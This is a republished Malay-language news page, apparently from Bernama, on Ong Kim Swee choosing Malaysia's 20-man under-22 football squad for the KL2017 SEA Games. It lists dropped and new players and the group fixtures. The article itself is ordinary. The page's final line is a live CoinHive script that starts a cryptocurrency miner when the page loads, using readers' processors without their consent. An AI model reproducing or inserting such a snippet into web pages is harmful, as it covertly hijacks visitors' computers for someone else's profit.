© Copyright 2017, All Rights Reserved
Home / Sukan / Kim Swee hadapi kesukaran senarai pemain terbaik ke KL2017

Kim Swee hadapi kesukaran senarai pemain terbaik ke KL2017


SHAH ALAM: Ketua jurulatih skuad bola sepak Bawah 22 (B-22) kebangsaan, Datuk Ong Kim Swee mengakui berdepan kesukaran memilih 20 permain terbaik untuk menggalas cabaran negara di temasya Sukan SEA Kuala Lumpur 2017 (KL2017).

Kim Swee, yang pernah membawa skuad negara memenangi pingat emas pada edisi 2011 di Indonesia, berkata kredibiliti 28 pemain yang dipanggil menyertai kem latihan pusat akhir sejak Ahad lepas menyukarkannya untuk memuktamadkan skuad KL2017.

“Pemilihan 20 pemain yang dibuat ini adalah yang paling sukar bagi saya sepanjang empat edisi saya membawa pasukan sebelum ini. Lapan pemain yang digugurkan mempunyai kredibiliti masing-masing dan saya percaya mereka akan kembali selepas ini untuk kejohanan yang akan datang.

“Bagi saya ini kejohanan yang cukup singkat jadi saya terpaksa membuat pilihan yang terbaik di mana saya mengutamakan pemain yang mempunyai kelebihan beraksi dalam masa yang singkat,” katanya pada sidang media pengumumam senarai akhir 20 pemain skuad bola sepak lelaki kebangsaan ke KL2017.

Seramai empat pemain daripada skuad Kelayakan Kejuaraan Konfederasi Bola Sepak Asia (AFC) B-23 2018 di Bangkok, Thailand, bulan lalu iaitu Amierul Hakimi Awang (Terengganu), Raphi Azizan Mariappen (PJ Rangers), Danial Ashraf Abdullah (Kelantan) dan Sean Eugene Selvaraj (Negeri Sembilan) antara lapan pemain yang digugurkan Kim Swee.

Sebagai ganti, Kim Swee telah menyenaraikan enam pemain baharu iaitu Syamer Kutty Abba dan S Kumaahran (Pulau Pinang), Haziq Nadzli dan Safawi Rasid (Johor Darul Ta’zim) serta Matthew Davies dan Nor Azam Abdul Azih (Pahang).

Skuad negara bakal membuka kempen Kumpulan A berdepan Brunei Isnin ini diikuti aksi bertemu Singapura (16 Ogos), Myanmar (21 Ogos) dan Laos (23 Ogos) di Stadium Shah Alam.

Berikut adalah senarai 20 pemain yang akan menggalas cabaran negara di KL2017:

Penjaga gol: Ifwat Akmal Chek Kassim (Kedah), Haziq Nadzli (Johor Darul Ta’zim).

Pertahanan: Ariff Farhan Md Isa (Kedah), Adib Zainuddin (Felcra FC), Adam Nor Azlin (Selangor), Irfan Zakaria (Kuala Lumpur), Syazwan Zaipol Bahari (PKNP FC) .

Tengah: Amirul Hisyam Awang Kechik (Kedah), Syamer Kutty Abba (Pulau Pinang), Nor Azam Abdul Azih (Pahang), Daniel Amier Norhisham (Felda United), Syahmi Safari (Selangor), Matthew Davies (Pahang), Syazwan Andik Ishak (Johor Darul Ta’zim ll).

Penyerang: Syafq Ahmad (Kedah), Akhyar Rashid (Kedah), Jafri Firdaus Chew (Pulau Pinang), S.Kumaahran (Pulau Pinang), Safawi Rashid (Johor Darul Ta’zim), N. Thanabalan (Felcra FC).

— BERNAMA


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Khairy kaji semula bidaan Sukan Komanwel 2022

PUTRAJAYA: Kementerian Belia dan Sukan bersedia mengkaji semula rancangan membida penganjuran temasya ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();